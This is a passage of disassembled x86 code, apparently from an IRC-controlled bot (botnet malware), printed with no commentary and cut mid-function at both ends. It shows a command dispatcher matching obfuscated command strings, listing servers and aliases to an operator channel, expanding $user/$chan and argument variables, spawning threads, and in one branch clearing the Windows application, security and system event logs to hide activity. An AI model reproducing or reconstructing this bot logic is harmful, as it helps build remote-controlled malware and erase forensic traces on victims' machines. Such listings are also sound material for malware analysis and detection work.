push dword ptr [ebx]
push offset aX_62c_3ldcp ; "X.62C.3LDCP/"
call edi ; dword_437178
test eax, eax
jnz short loc_40AD30
push offset aXwzwo1pqcgt16n ; "XWzwO1PqcgT16N5aw.affEY1"
jmp loc_40ADE4
; ---------------------------------------------------------------------------
loc_40AD30: ; CODE XREF: sub_40A9FE+326�j
push dword ptr [ebx]
push offset aImvbw1shwxq0 ; "iMvbW1SHwxQ0"
call edi ; dword_437178
test eax, eax
jnz short loc_40AD47
push offset aAxauo_rlggx0 ; "aXauo.rLGgX0"
jmp loc_40ADE4
; ---------------------------------------------------------------------------
loc_40AD47: ; CODE XREF: sub_40A9FE+33D�j
push dword ptr [ebx]
push offset aUyfog_dvvny0 ; "UyfOG.DvVnY0"
call edi ; dword_437178
test eax, eax
jz loc_40ADD8
push dword ptr [ebx]
push offset aPsern1aagh6_ ; "pSern1AAGh6."
call edi ; dword_437178
test eax, eax
jz short loc_40ADD8
push dword ptr [ebx]
push offset aXkg84_cesgs_ ; "XkG84.cESgs."
call edi ; dword_437178
test eax, eax
jz short loc_40ADD8
push dword ptr [ebx]
push offset aP06vqBfbmo_ ; "p06vq/BFBMo."
call edi ; dword_437178
test eax, eax
jz short loc_40ADD8
push dword ptr [ebx]
push offset aW1w2v121jsp_ ; "w1w2V121JSP."
call edi ; dword_437178
test eax, eax
jnz short loc_40AD93
push offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
jmp short loc_40ADE4
; ---------------------------------------------------------------------------
loc_40AD93: ; CODE XREF: sub_40A9FE+38C�j
push dword ptr [ebx]
push offset aEm42x_1iszi1 ; "Em42x.1IsZI1"
call edi ; dword_437178
test eax, eax
jz short loc_40ADAD
push dword ptr [ebx]
push offset aKmdie1uwntq ; "KmdIe1UwntQ/"
call edi ; dword_437178
test eax, eax
jnz short loc_40ADB9
loc_40ADAD: ; CODE XREF: sub_40A9FE+3A0�j
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
push 0Eh
jmp loc_40AA6E
; ---------------------------------------------------------------------------
loc_40ADB9: ; CODE XREF: sub_40A9FE+3AD�j
push dword ptr [ebx]
push offset aV6jbh0k4uD_ ; "V6jBH0k4u/d."
call edi ; dword_437178
test eax, eax
jnz short loc_40AE0F
push esi
push offset aIexplore_exe ; "iexplore.exe"
call sub_41FE3F
pop ecx
pop ecx
jmp loc_414995
; ---------------------------------------------------------------------------
loc_40ADD8: ; CODE XREF: sub_40A9FE+354�j
; sub_40A9FE+365�j ...
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
jmp short loc_40ADE4
; ---------------------------------------------------------------------------
loc_40ADDF: ; CODE XREF: sub_40A9FE+2CB�j
; sub_40A9FE+2DC�j ...
push offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
loc_40ADE4: ; CODE XREF: sub_40A9FE+2BB�j
; sub_40A9FE+316�j ...
push 0Dh
jmp loc_40AA6E
; ---------------------------------------------------------------------------
loc_40ADEB: ; CODE XREF: sub_40A9FE+279�j
; sub_40A9FE+28A�j
push offset aWhdag1glagf_ ; "WHdAg1glAgf."
push 0Fh
jmp loc_40AA6E
; ---------------------------------------------------------------------------
loc_40ADF7: ; CODE XREF: sub_40A9FE+168�j
; sub_40A9FE+179�j ...
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push 8
jmp loc_40AA6E
; ---------------------------------------------------------------------------
loc_40AE03: ; CODE XREF: sub_40A9FE+11D�j
; sub_40A9FE+12E�j
push offset aFfec81uznt81 ; "fFEC81UzNT81"
push 3
jmp loc_40AA6E
; ---------------------------------------------------------------------------
loc_40AE0F: ; CODE XREF: sub_40A9FE+56�j
; sub_40A9FE+3C6�j
push offset aDehziSaO0 ; "deHZI/SA//o0"
push dword ptr [ebx]
call edi ; dword_437178
test eax, eax
jnz short loc_40AE69
cmp [ebp+arg_20], eax
mov edi, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
mov esi, offset a5v1zc1efrzg_tc ; "5v1zc1EfRZg.tccap0cH5OH0NHckR.k9Wj.1"
mov ebx, offset aSS_1 ; "%s %s"
jz short loc_40AE52
cmp [ebp+arg_18], eax
jnz short loc_40AE5C
cmp [ebp+arg_14], eax
jnz loc_414995
mov eax, [ebp+arg_C]
push esi
push edi
push ebx
push dword ptr [eax+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
loc_40AE52: ; CODE XREF: sub_40A9FE+430�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40AE5C: ; CODE XREF: sub_40A9FE+435�j
push esi
push edi
push ebx
loc_40AE5F: ; CODE XREF: sub_40A9FE+73F�j
mov eax, [ebp+arg_C]
push dword ptr [eax]
jmp loc_414793
; ---------------------------------------------------------------------------
loc_40AE69: ; CODE XREF: sub_40A9FE+41C�j
push dword ptr [ebx]
push offset aDj9owUmrbd_ ; "dJ9OW/uMRBD."
call edi ; dword_437178
test eax, eax
jnz loc_40AF5E
mov ebx, [ebx+4]
cmp ebx, esi
jnz short loc_40AECD
mov ecx, dword_457D0C
mov edx, offset aSsl ; " (SSL)"
mov eax, ecx
imul eax, 0B8h
cmp dword_443FF4[eax], esi
jnz short loc_40AEA1
mov edx, offset byte_454A54
loc_40AEA1: ; CODE XREF: sub_40A9FE+49C�j
push edx
push dword_443FF0[eax]
lea eax, dword_443F40[eax]
push eax
mov eax, [ebp+arg_C]
push ecx
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push offset aSServerISDS ; "%s: Server: [%i: %s:%d%s]"
push dword ptr [eax+0Ch]
push [ebp+arg_10]
call sub_41CE4A
jmp loc_412CB7
; ---------------------------------------------------------------------------
loc_40AECD: ; CODE XREF: sub_40A9FE+481�j
push ebx
push offset aPlsymAee6v1 ; "PlsYM/aEe6v1"
call edi ; dword_437178
test eax, eax
jnz loc_414995
mov esi, [ebp+arg_C]
push offset aListComplete ; "-=[List Complete]=-"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
xor ebx, ebx
add esp, 0Ch
cmp dword_445D20, ebx
jle short loc_40AF44
mov edi, offset dword_443FF0
loc_40AF02: ; CODE XREF: sub_40A9FE+544�j
cmp dword ptr [edi+4], 0
mov eax, offset aSsl ; " (SSL)"
jnz short loc_40AF12
mov eax, offset byte_454A54
loc_40AF12: ; CODE XREF: sub_40A9FE+50D�j
push offset dword_443F14
push eax
push dword ptr [edi]
lea eax, [edi-0B0h]
push eax
push ebx
push offset aISDSS ; "%i: %s:%d%s, %s"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 20h
inc ebx
add edi, 0B8h
cmp ebx, dword_445D20
jl short loc_40AF02
loc_40AF44: ; CODE XREF: sub_40A9FE+4FD�j
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push offset aSServerListCom ; "%s Server List complete."
push dword ptr [esi+0Ch]
loc_40AF51: ; CODE XREF: sub_40A9FE+46EE�j
push [ebp+arg_10]
call sub_41CE4A
jmp loc_41474E
; ---------------------------------------------------------------------------
loc_40AF5E: ; CODE XREF: sub_40A9FE+476�j
push dword ptr [ebx]
push offset aL3nyw_d7tfl_ ; "l3nYW.D7Tfl."
call edi ; dword_437178
test eax, eax
jnz loc_40B02C
cmp [ebp+arg_14], eax
mov esi, [ebp+arg_C]
mov edi, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
mov ebx, offset aSAliasList ; "%s [Alias list]"
jnz short loc_40AF96
cmp [ebp+arg_18], eax
jnz short loc_40AF9C
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 10h
loc_40AF96: ; CODE XREF: sub_40A9FE+581�j
cmp [ebp+arg_18], 0
jz short loc_40AFAB
loc_40AF9C: ; CODE XREF: sub_40A9FE+586�j
push edi
push ebx
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 10h
loc_40AFAB: ; CODE XREF: sub_40A9FE+59C�j
xor ebx, ebx
cmp dword_437330, ebx
jle loc_414995
mov edi, offset dword_4570C0
loc_40AFBE: ; CODE XREF: sub_40A9FE+627�j
cmp byte ptr [edi], 0
jz short loc_40B018
lea eax, [edi+18h]
push eax
push edi
push ebx
lea eax, [ebp+var_26EE0]
push offset aD_SS ; "%d. %s = %s"
push eax
call sub_429B03
add esp, 14h
cmp [ebp+arg_14], 0
jnz short loc_40AFFE
cmp [ebp+arg_18], 0
jnz short loc_40B004
lea eax, [ebp+var_26EE0]
push eax
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 0Ch
loc_40AFFE: ; CODE XREF: sub_40A9FE+5E3�j
cmp [ebp+arg_18], 0
jz short loc_40B018
loc_40B004: ; CODE XREF: sub_40A9FE+5E9�j
lea eax, [ebp+var_26EE0]
push eax
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 0Ch
loc_40B018: ; CODE XREF: sub_40A9FE+5C3�j
; sub_40A9FE+604�j
inc ebx
add edi, 0B8h
cmp ebx, dword_437330
jl short loc_40AFBE
jmp loc_414995
; ---------------------------------------------------------------------------
loc_40B02C: ; CODE XREF: sub_40A9FE+56B�j
push dword ptr [ebx]
push offset aP00ls0k4t_n1 ; "P00Ls0K4t.N1"
call edi ; dword_437178
test eax, eax
jnz loc_40B142
cmp [ebx+4], esi
jz loc_40B101
mov eax, [ebx+8]
cmp eax, esi
jz loc_40B101
push eax
lea eax, [ebp+var_2D24]
push offset aS_5 ; "%s"
push eax
call sub_429B03
add esp, 0Ch
push 3
pop edi
cmp [ebp+arg_4], edi
jle short loc_40B0A8
loc_40B06E: ; CODE XREF: sub_40A9FE+6A8�j
mov eax, [ebx+edi*4]
cmp eax, esi
jz short loc_40B0A2
push eax
lea eax, [ebp+var_62D0]
push offset aS_1 ; " %s"
push eax
call sub_429B03
lea eax, [ebp+var_62D0]
push 104h
push eax
lea eax, [ebp+var_2D24]
push eax
call sub_4299E0
add esp, 18h
loc_40B0A2: ; CODE XREF: sub_40A9FE+675�j
inc edi
cmp edi, [ebp+arg_4]
jl short loc_40B06E
loc_40B0A8: ; CODE XREF: sub_40A9FE+66E�j
lea eax, [ebp+var_2D24]
push eax
push dword ptr [ebx+4]
call sub_418D90
cmp [ebp+arg_14], 0
mov esi, [ebp+arg_C]
pop ecx
mov edi, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
pop ecx
mov ebx, offset aSAddedAliasS ; "%s Added Alias: %s"
jnz short loc_40B0E9
cmp [ebp+arg_18], 0
jnz short loc_40B0F3
lea eax, [ebp+var_2D24]
push eax
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
loc_40B0E9: ; CODE XREF: sub_40A9FE+6CC�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40B0F3: ; CODE XREF: sub_40A9FE+6D2�j
lea eax, [ebp+var_2D24]
loc_40B0F9: ; CODE XREF: sub_40A9FE+2445�j
; sub_40A9FE+4B84�j ...
push eax
loc_40B0FA: ; CODE XREF: sub_40A9FE+D3B�j
; sub_40A9FE+83BA�j
push edi
loc_40B0FB: ; CODE XREF: sub_40A9FE+171E�j
; sub_40A9FE+4929�j ...
push ebx
jmp loc_414791
; ---------------------------------------------------------------------------
loc_40B101: ; CODE XREF: sub_40A9FE+642�j
; sub_40A9FE+64D�j
cmp [ebp+arg_14], 0
mov edi, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
mov esi, offset aSS_1 ; "%s %s"
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz short loc_40B130
cmp [ebp+arg_18], 0
jnz short loc_40B13A
mov eax, [ebp+arg_C]
push ebx
push edi
push esi
push dword ptr [eax+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
loc_40B130: ; CODE XREF: sub_40A9FE+716�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40B13A: ; CODE XREF: sub_40A9FE+71C�j
push ebx
push edi
push esi
jmp loc_40AE5F
; ---------------------------------------------------------------------------
loc_40B142: ; CODE XREF: sub_40A9FE+639�j
and [ebp+var_4], 0
cmp dword_437330, 0
mov esi, [ebp+arg_C]
jle loc_40B288
mov [ebp+arg_68], offset dword_4570D8
loc_40B15D: ; CODE XREF: sub_40A9FE+884�j
mov eax, [ebp+arg_68]
push dword ptr [ebx]
add eax, 0FFFFFFE8h
push eax
call edi ; dword_437178
test eax, eax
jnz loc_40B26F
movsx eax, byte_4439A0
push [ebp+arg_68]
push eax
lea eax, [ebp+var_9A20]
push offset dword_4416C4
push eax
call sub_429B03
mov ecx, [ebp+arg_10]
add esp, 10h
call sub_41DB58
push eax
lea eax, [ebp+var_9A20]
push offset off_4416C0
push eax
call sub_4279FA
mov ecx, [ebp+arg_10]
add esp, 0Ch
call sub_41DB5C
push eax
lea eax, [ebp+var_9A20]
push offset aUser_0 ; "$user"
push eax
call sub_4279FA
push offset dword_443F14
lea eax, [ebp+var_9A20]
push offset aChan ; "$chan"
push eax
call sub_4279FA
push dword ptr [ebx+4]
lea eax, [ebp+var_9A20]
push offset a1_0 ; "$1"
push eax
call sub_4279FA
push dword ptr [ebx+8]
lea eax, [ebp+var_9A20]
push offset a2 ; "$2"
push eax
call sub_4279FA
push dword ptr [ebx+0Ch]
lea eax, [ebp+var_9A20]
push offset a3 ; "$3"
push eax
call sub_4279FA
push dword ptr [ebx+10h]
lea eax, [ebp+var_9A20]
push offset a4 ; "$4"
push eax
call sub_4279FA
add esp, 48h
lea eax, [ebp+var_9A20]
push dword ptr [ebx+14h]
push offset a5 ; "$5"
push eax
call sub_4279FA
push dword ptr [ebx+18h]
lea eax, [ebp+var_9A20]
push offset a6 ; "$6"
push eax
call sub_4279FA
push 0
lea eax, [ebp+var_9A20]
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push eax
call sub_40A935
add esp, 2Ch
loc_40B26F: ; CODE XREF: sub_40A9FE+76C�j
inc [ebp+var_4]
add [ebp+arg_68], 0B8h
mov eax, [ebp+var_4]
cmp eax, dword_437330
jl loc_40B15D
loc_40B288: ; CODE XREF: sub_40A9FE+752�j
push dword ptr [ebx]
push offset aEuior0ay2w7__0 ; "EUIOR0ay2w7."
call edi ; dword_437178
test eax, eax
jnz loc_40B403
mov ebx, [ebx+4]
test ebx, ebx
jz loc_40B3A3
push ebx
call sub_42A100
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jl loc_40B35D
cmp eax, 3
jge loc_40B35D
mov ecx, [ebp+arg_10]
push eax
call sub_41C704
test eax, eax
mov ebx, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
jz short loc_40B31D
cmp [ebp+arg_14], 0
mov edi, offset aEuior0ay2w7_ ; "EUIOR0ay2w7."
jnz short loc_40B2FF
cmp [ebp+arg_18], 0
jnz short loc_40B309
push edi
push [ebp+arg_C]
push offset a5_xnq0cowxs0 ; "5.Xnq0cowXs0"
push ebx
push offset aSSIS ; "%s %s (%i) %s"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 1Ch
loc_40B2FF: ; CODE XREF: sub_40A9FE+8DC�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40B309: ; CODE XREF: sub_40A9FE+8E2�j
push edi
push [ebp+arg_C]
push offset a5_xnq0cowxs0 ; "5.Xnq0cowXs0"
push ebx
push offset aSSIS ; "%s %s (%i) %s"
jmp loc_414988
; ---------------------------------------------------------------------------
loc_40B31D: ; CODE XREF: sub_40A9FE+8D1�j
cmp [ebp+arg_14], 0
mov edi, offset aSSI ; "%s %s (%i)"
jnz short loc_40B346
cmp [ebp+arg_18], 0
jnz short loc_40B350
push [ebp+arg_C]
push offset a8y4sz09fdh50tc ; "8Y4sz09fDH50tccap0cH5OH0/mDXM1sxCV2/iNR"...
push ebx
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_40B346: ; CODE XREF: sub_40A9FE+928�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40B350: ; CODE XREF: sub_40A9FE+92E�j
push [ebp+arg_C]
push offset a8y4sz09fdh50tc ; "8Y4sz09fDH50tccap0cH5OH0/mDXM1sxCV2/iNR"...
jmp loc_41491B
; ---------------------------------------------------------------------------
loc_40B35D: ; CODE XREF: sub_40A9FE+8B2�j
; sub_40A9FE+8BB�j
cmp [ebp+arg_14], 0
mov edi, offset aSSI ; "%s %s (%i)"
mov ebx, offset aRnyaa0crtpo0yy ; "RNYAA0crTPO0yYB2h.Fe8bw.iRLzu0EdQ3j/1D6"...
jnz short loc_40B38B
cmp [ebp+arg_18], 0
jnz short loc_40B395
push [ebp+arg_C]
push ebx
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_40B38B: ; CODE XREF: sub_40A9FE+96D�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40B395: ; CODE XREF: sub_40A9FE+973�j
push [ebp+arg_C]
loc_40B398: ; CODE XREF: sub_40A9FE+1BC9�j
push ebx
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
jmp loc_41491C
; ---------------------------------------------------------------------------
loc_40B3A3: ; CODE XREF: sub_40A9FE+8A0�j
push dword ptr [esi+8]
mov ecx, [ebp+arg_10]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_41C65E
cmp eax, 0FFFFFFFFh
jz loc_414995
cmp [ebp+arg_14], 0
mov ebx, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
mov edi, offset aEuior0ay2w7_ ; "EUIOR0ay2w7."
jnz short loc_40B3E9
cmp [ebp+arg_18], 0
jnz short loc_40B3F3
push edi
push dword ptr [esi]
push ebx
push offset aSS_1 ; "%s %s"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_40B3E9: ; CODE XREF: sub_40A9FE+9CC�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40B3F3: ; CODE XREF: sub_40A9FE+9D2�j
mov esi, [esi]
push edi
push esi
push ebx
push offset aSS_1 ; "%s %s"
push esi
jmp loc_41491F
; ---------------------------------------------------------------------------
loc_40B403: ; CODE XREF: sub_40A9FE+895�j
push dword ptr [ebx]
push offset aPdazx1odsoh0 ; "PDazX1oDSOh0"
call edi ; dword_437178
test eax, eax
jnz short loc_40B420
push dword ptr [esi+0Ch]
mov ecx, [ebp+arg_10]
call sub_41C7C5
jmp loc_414995
; ---------------------------------------------------------------------------
loc_40B420: ; CODE XREF: sub_40A9FE+A10�j
push offset aUc6wg1ovwvt1 ; "uc6Wg1OvWVt1"
push dword ptr [ebx]
call edi ; dword_437178
test eax, eax
jnz loc_40B55A
mov ebx, [ebx+4]
xor edi, edi
cmp ebx, edi
jz loc_414995
push ebx
call sub_4155AA
push eax
push offset dword_443E8C
call sub_42B260
add esp, 0Ch
test eax, eax
jnz loc_414995
mov ebx, [ebp+arg_20]
push offset aO_sxv_ze9bk1go ; "O.sxv.ze9bK1GOISY.dO.Vn1"
push 3
push edi
push ebx
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [esi+0Ch]
call sub_423654
mov eax, [ebp+arg_14]
add esp, 20h
mov [ebp+var_E64], eax
mov [ebp+var_E68], ebx
push dword ptr [esi+0Ch]
lea eax, [ebp+var_F14]
push eax
call dword_4370B4 ; lstrcpyA
mov eax, [ebp+arg_10]
push offset aUnsecured ; "Unsecured"
push offset aJvatg1988z81 ; "jVATg1988z81"
push offset aSS_ ; "%s %s."
push 3
mov [ebp+var_F18], eax
mov [ebp+var_E84], edi
mov [ebp+var_E80], edi
call sub_4234A7
add esp, 10h
mov [ebp+var_E94], eax
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_F18]
push edi
push eax
push offset sub_422009
push edi
push edi
call dword_437180 ; CreateThread
mov ecx, [ebp+var_E94]
mov ebx, dword_437190
imul ecx, 2724h
cmp eax, edi
mov dword_46D72C[ecx], eax
jz short loc_40B510
jmp short loc_40B508
; ---------------------------------------------------------------------------
loc_40B504: ; CODE XREF: sub_40A9FE+B10�j
push 32h
call ebx ; dword_437190
loc_40B508: ; CODE XREF: sub_40A9FE+B04�j
cmp [ebp+var_E5C], edi
jz short loc_40B504
loc_40B510: ; CODE XREF: sub_40A9FE+B02�j
push 3E8h
call ebx ; dword_437190
push edi
push edi
call sub_427DAA
pop ecx
mov eax, offset dword_43D664
pop ecx
push eax
push eax
push dword ptr [esi]
push offset a6f3al1m_ydx05y ; "6f3aL1m.YdX05ythl/YiVnR/jSlje0VWu/50peq"...
push offset aSSS@S ; "%s [%s!%s@%s]"
push [ebp+arg_10]
call sub_41CAB4
add esp, 18h
push 3E8h
call ebx ; dword_437190
mov ecx, [ebp+arg_10]
call sub_41CA82
call dword_456E58 ; WSACleanup
push edi
call dword_4370D4 ; ExitProcess
loc_40B55A: ; CODE XREF: sub_40A9FE+A2D�j
push dword ptr [ebx]
push offset aVsz2xXqjp5 ; "Vsz2x/xqJP5/"
call edi ; dword_437178
test eax, eax
jnz loc_40B66C
xor ebx, ebx
cmp dword_457034, ebx
jnz loc_40B636
mov edi, 94h
lea eax, [ebp+var_2978]
push edi
push ebx
push eax
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_2978]
mov [ebp+var_2978], edi
push eax
call dword_437050 ; GetVersionExA
cmp [ebp+var_2968], 2
mov dword ptr [ebp+var_14+4], offset aApplication ; "application"
mov dword ptr [ebp+var_C], offset aSecurity ; "security"
mov dword ptr [ebp+var_C+4], offset aSystem ; "system"
mov [ebp+arg_C], ebx
jnz short loc_40B5F4
xor edi, edi
loc_40B5C5: ; CODE XREF: sub_40A9FE+BF4�j
push dword ptr [ebp+edi*4+var_14+4]
push 0
call dword_456E90 ; OpenEventLogA
mov ebx, eax
test ebx, ebx
jz short loc_40B5EE
push 0
push ebx
call dword_456EA0 ; ClearEventLogA
test eax, eax
jz short loc_40B5E7
inc [ebp+arg_C]
loc_40B5E7: ; CODE XREF: sub_40A9FE+BE4�j
push ebx
call dword_456E4C ; CloseEventLog
loc_40B5EE: ; CODE XREF: sub_40A9FE+BD7�j
inc edi
cmp edi, 3
jl short loc_40B5C5
loc_40B5F4: ; CODE XREF: sub_40A9FE+BC3�j
xor eax, eax
cmp [ebp+arg_14], eax
jnz loc_414995
cmp [ebp+arg_18], eax
jnz loc_414995
cmp [ebp+arg_C], eax
mov edi, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
jle short loc_40B62B
push 3
push [ebp+arg_C]
push edi
push offset aSClearedDDSysl ; "%s Cleared [%d/%d] syslogs"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_40B62B: ; CODE XREF: sub_40A9FE+C12�j
push edi
push offset aSFailedToClear ; "%s Failed to clear syslogs"
jmp loc_40F0E9
; ---------------------------------------------------------------------------
loc_40B636: ; CODE XREF: sub_40A9FE+B75�j
mov edi, offset aSAdvapi_dllNot ; "%s Advapi.dll not loaded"
loc_40B63B: ; CODE XREF: sub_40A9FE+287C�j
mov ebx, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
loc_40B640: ; CODE XREF: sub_40A9FE+2832�j
; sub_40A9FE+283D�j ...
cmp [ebp+arg_14], 0
jnz short loc_40B65C
cmp [ebp+arg_18], 0
jnz short loc_40B666
push ebx
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 10h
loc_40B65C: ; CODE XREF: sub_40A9FE+C46�j
cmp [ebp+arg_18], 0
loc_40B660: ; CODE XREF: sub_40A9FE+60AE�j
jz loc_414995
loc_40B666: ; CODE XREF: sub_40A9FE+C4C�j
; sub_40A9FE+6093�j
push ebx
jmp loc_414743
; ---------------------------------------------------------------------------
loc_40B66C: ; CODE XREF: sub_40A9FE+B67�j
push dword ptr [ebx]
push offset aOb4iqKj5ue_ ; "Ob4iQ/KJ5ue."
call edi ; dword_437178
test eax, eax
jnz loc_40B92B
mov eax, [ebx+4]
test eax, eax
jz loc_40B7D7
push eax
push offset aE0idd0rdw2u ; "e0idD0RDw2U/"
call edi ; dword_437178
test eax, eax
jnz loc_40B7D7
mov eax, [ebx+8]
test eax, eax
jz loc_414995
push eax
push offset a86tb1fspjg0 ; "86tb/1FSpjg0"
call edi ; dword_437178
test eax, eax
jnz loc_40B73E
call sub_4235A4
test eax, eax
mov [ebp+arg_C], eax
mov edi, offset aO_sxv_ze9bk1go ; "O.sxv.ze9bK1GOISY.dO.Vn1"
jle short loc_40B704
cmp [ebp+arg_14], 0
mov ebx, offset aSDS ; "%s %d %s"
jnz short loc_40B6EB
cmp [ebp+arg_18], 0
jnz short loc_40B6F5
push offset aTfee90w_vdg1u8 ; "TFEE90W.vdG1u8Ajp1eidrT.d2k2X/no6gm/"
push eax
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_40B6EB: ; CODE XREF: sub_40A9FE+CCF�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40B6F5: ; CODE XREF: sub_40A9FE+CD5�j
push offset aTfee90w_vdg1u8 ; "TFEE90W.vdG1u8Ajp1eidrT.d2k2X/no6gm/"
push [ebp+arg_C]
loc_40B6FD: ; CODE XREF: sub_40A9FE+4FBC�j
push edi
loc_40B6FE: ; CODE XREF: sub_40A9FE+8457�j
push ebx
jmp loc_41491D
; ---------------------------------------------------------------------------
loc_40B704: ; CODE XREF: sub_40A9FE+CC4�j
cmp [ebp+arg_14], 0
mov ebx, offset aSS_1 ; "%s %s"
jnz short loc_40B72A
cmp [ebp+arg_18], 0
jnz short loc_40B734
push offset aIbtox1Hofe0hcx ; "IBtOx1/HOfe0Hcxmb/oUlVg00eWuQ.F61Hj/"
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
loc_40B72A: ; CODE XREF: sub_40A9FE+D0F�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40B734: ; CODE XREF: sub_40A9FE+D15�j
push offset aIbtox1Hofe0hcx ; "IBtOx1/HOfe0Hcxmb/oUlVg00eWuQ.F61Hj/"
jmp loc_40B0FA
; ---------------------------------------------------------------------------
loc_40B73E: ; CODE XREF: sub_40A9FE+CAF�j
push dword ptr [ebx+8]
call sub_42A100
push eax
call sub_42352C
pop ecx
mov edi, offset aSSS_0 ; "%s %s (%s)"
test eax, eax
pop ecx
jz short loc_40B793
cmp [ebp+arg_14], 0
jnz short loc_40B77F
cmp [ebp+arg_18], 0
jnz short loc_40B789
push dword ptr [ebx+8]
push offset aTpzyk0moe8_0jt ; "TpzyK0MOE8.0jTPEZ1dC0uG0"
push offset aO_sxv_ze9bk1go ; "O.sxv.ze9bK1GOISY.dO.Vn1"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_40B77F: ; CODE XREF: sub_40A9FE+D5D�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40B789: ; CODE XREF: sub_40A9FE+D63�j
push dword ptr [ebx+8]
push offset aTpzyk0moe8_0jt ; "TpzyK0MOE8.0jTPEZ1dC0uG0"
jmp short loc_40B7CD
; ---------------------------------------------------------------------------
loc_40B793: ; CODE XREF: sub_40A9FE+D57�j
cmp [ebp+arg_14], 0
jnz short loc_40B7BB
cmp [ebp+arg_18], 0
jnz short loc_40B7C5
push dword ptr [ebx+8]
push offset a4ezrg1ye5hp1o2 ; "4Ezrg1ye5hp1O2jqY1BhtQc.jTPEZ1dC0uG0"
push offset aO_sxv_ze9bk1go ; "O.sxv.ze9bK1GOISY.dO.Vn1"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_40B7BB: ; CODE XREF: sub_40A9FE+D99�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40B7C5: ; CODE XREF: sub_40A9FE+D9F�j
push dword ptr [ebx+8]
push offset a4ezrg1ye5hp1o2 ; "4Ezrg1ye5hp1O2jqY1BhtQc.jTPEZ1dC0uG0"
loc_40B7CD: ; CODE XREF: sub_40A9FE+D93�j
; sub_40A9FE+E22�j ...
push offset aO_sxv_ze9bk1go ; "O.sxv.ze9bK1GOISY.dO.Vn1"
jmp loc_41491C
; ---------------------------------------------------------------------------
loc_40B7D7: ; CODE XREF: sub_40A9FE+C84�j
; sub_40A9FE+C94�j
push 6
call sub_42381F
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_40B822
cmp [ebp+arg_14], 0
mov ebx, offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_40B812
cmp [ebp+arg_18], 0
jnz short loc_40B81C
push eax
push ebx
push offset aO_sxv_ze9bk1go ; "O.sxv.ze9bK1GOISY.dO.Vn1"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_40B812: ; CODE XREF: sub_40A9FE+DF6�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_40B81C: ; CODE XREF: sub_40A9FE+DFC�j
push [ebp+arg_C]
push ebx
jmp short loc_40B7CD
; ---------------------------------------------------------------------------
loc_40B822: ; CODE XREF: sub_40A9FE+DE6�j
mov eax, [ebp+arg_14]
mov [ebp+var_AFC], eax
mov eax, [ebp+arg_20]
mov [ebp+var_B00], eax
mov eax, [ebp+arg_18]
mov [ebp+var_AF8], eax
test eax, eax
lea eax, [ebp+var_BAC]
jnz short loc_40B84C
